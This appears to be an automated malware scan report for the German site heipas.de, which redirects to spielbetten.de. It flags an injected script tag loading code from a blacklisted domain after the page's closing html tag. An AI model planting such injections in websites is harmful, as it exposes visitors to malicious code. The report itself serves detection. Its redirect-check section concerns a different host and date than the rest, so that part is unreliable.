Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=heipas.de
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: avatarcat.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 07 Jul 2015 05:07:03 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4
Content-Type: text/html
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: avatarcat.com
Referer: http://www.google.com/search?q=avatarcat.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://heipas.de/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 17:47:27 GMT Location: http://www.spielbetten.de/ Server: Apache/2.2.10 (Linux/SUSE) Content-Length: 313 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://www.spielbetten.de/ | 200 OK Content-Length: 16633 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.schneiderjan.de ...[4183 bytes skipped]... t;script type="text/javascript"> /* <![CDATA[ */ new Request({ url:'system/html/cron.txt', onComplete: function(txt) { if (!txt) txt = 0; if (parseInt(txt) < (Math.round(+new Date()/1000) - 300)) { new Request({url:'cron.php'}).get(); } } }).get(); /* ]]> */ </script> </body> </html><script type="text/javascript" src="http://www.schneiderjan.de/kdtfmmjp.php?id=5806677"></script> | ||
http://www.spielbetten.de/system/scripts/e53a815ab435.js | 200 OK Content-Length: 180027 Content-Type: text/x-js | clean |
http://www.spielbetten.de/test404page.js | 404 Not Found Content-Length: 1051 Content-Type: text/html | clean |
http://heipas.de/plugins/ce_slider/ce_slider.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 17:47:29 GMT Location: http://www.spielbetten.de/plugins/ce_slider/ce_slider.js Server: Apache/2.2.10 (Linux/SUSE) Content-Length: 343 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://www.spielbetten.de/plugins/ce_slider/ce_slider.js | 200 OK Content-Length: 10729 Content-Type: text/x-js | clean |
http://heipas.de/plugins/mediabox/1.4.6/js/mediabox.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 17:47:29 GMT Location: http://www.spielbetten.de/plugins/mediabox/1.4.6/js/mediabox.js Server: Apache/2.2.10 (Linux/SUSE) Content-Length: 350 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://www.spielbetten.de/plugins/mediabox/1.4.6/js/mediabox.js | 200 OK Content-Length: 20292 Content-Type: text/x-js | clean |
http://www.spielbetten.de/plugins/mediabox/1.4.6/js/{x} | 404 Not Found Content-Length: 1051 Content-Type: text/html | clean |
http://heipas.de/system/scripts/dc67f59d9359.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 17:47:31 GMT Location: http://www.spielbetten.de/system/scripts/dc67f59d9359.js Server: Apache/2.2.10 (Linux/SUSE) Content-Length: 343 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://www.spielbetten.de/system/scripts/dc67f59d9359.js | 200 OK Content-Length: 18235 Content-Type: text/x-js | clean |
http://www.spielbetten.de/system/scripts/ | 200 OK Content-Length: 313 Content-Type: text/html | clean |
http://heipas.de/plugins/slimbox/js/slimbox.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 17:47:32 GMT Location: http://www.spielbetten.de/plugins/slimbox/js/slimbox.js Server: Apache/2.2.10 (Linux/SUSE) Content-Length: 342 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | malicious |
http://www.spielbetten.de/plugins/slimbox/js/slimbox.js | 200 OK Content-Length: 4107 Content-Type: text/x-js | clean |
http://www.schneiderjan.de/kdtfmmjp.php?id=5806677 | 404 Not Found Content-Length: 1363 Content-Type: text/html | clean |